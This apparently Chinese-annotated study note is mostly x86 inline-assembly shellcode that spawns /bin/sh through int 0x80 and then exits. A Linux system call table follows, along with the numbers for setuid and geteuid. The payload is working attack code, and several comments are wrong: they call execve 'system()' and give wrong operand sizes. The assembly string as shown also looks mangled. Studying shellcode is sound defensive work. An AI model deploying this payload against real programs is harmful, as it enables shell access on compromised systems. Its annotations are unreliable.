void main(){ __asm__(" jmp 1f //跳到1： f 向后 2: popl %esi // esp弹出 返回地址 movl %esi,0x8(%esi) // l 2个字节 esi+0x8=esi

                   xorl    %eax,%eax // 处理\0                       movb    %eax,0x7(%esi) // b一个字节 esi+0x7=eax=0                       movl    %eax,0xc(%esi) // l两个字节 esi+0xc=eax=0                       movb    $0xb,%al // b一个字节 al=0xb 的时候，调用系统函数                       movl    %esi,%ebx // ebx=esi                      leal   0x8(%esi),%ecx // ecx=0x8+esi                       leal    0xc(%esi),%edx // edx=0xc+esi system参数                       int     $0x80 // al=0xb,0x80调用系统api为int system(const char *command)                       xorl    %ebx,%ebx // ebx清零                       movl    %ebx,%eax // eax=ebx=0                      inc    %eax // eax +1 =1 自增                       int     $0x80 // eax=1,调用系统函数exit()        1:             call    2b // call 调用函数                       .string \\"/bin/sh\\" // 返回地址,\\转义字符，字符号长度0x8，最后一个为\0        ");}

附系统函数调用表：

fn_ptr sys_call_table[] = { sys_setup, sys_exit, sys_fork, sys_read,
sys_write, sys_open, sys_close, sys_waitpid, sys_creat, sys_link,
sys_unlink, sys_execve, sys_chdir, sys_time, sys_mknod, sys_chmod,
sys_chown, sys_break, sys_stat, sys_lseek, sys_getpid, sys_mount,
sys_umount, sys_setuid, sys_getuid, sys_stime, sys_ptrace, sys_alarm,
sys_fstat, sys_pause, sys_utime, sys_stty, sys_gtty, sys_access,
sys_nice, sys_ftime, sys_sync, sys_kill, sys_rename, sys_mkdir,
sys_rmdir, sys_dup, sys_pipe, sys_times, sys_prof, sys_brk, sys_setgid,
sys_getgid, sys_signal, sys_geteuid, sys_getegid, sys_acct, sys_phys,
sys_lock, sys_ioctl, sys_fcntl, sys_mpx, sys_setpgid, sys_ulimit,
sys_uname, sys_umask, sys_chroot, sys_ustat, sys_dup2, sys_getppid,
sys_getpgrp, sys_setsid, sys_sigaction, sys_sgetmask, sys_ssetmask,
sys_setreuid,sys_setregid };

49 geteuid

23 setuid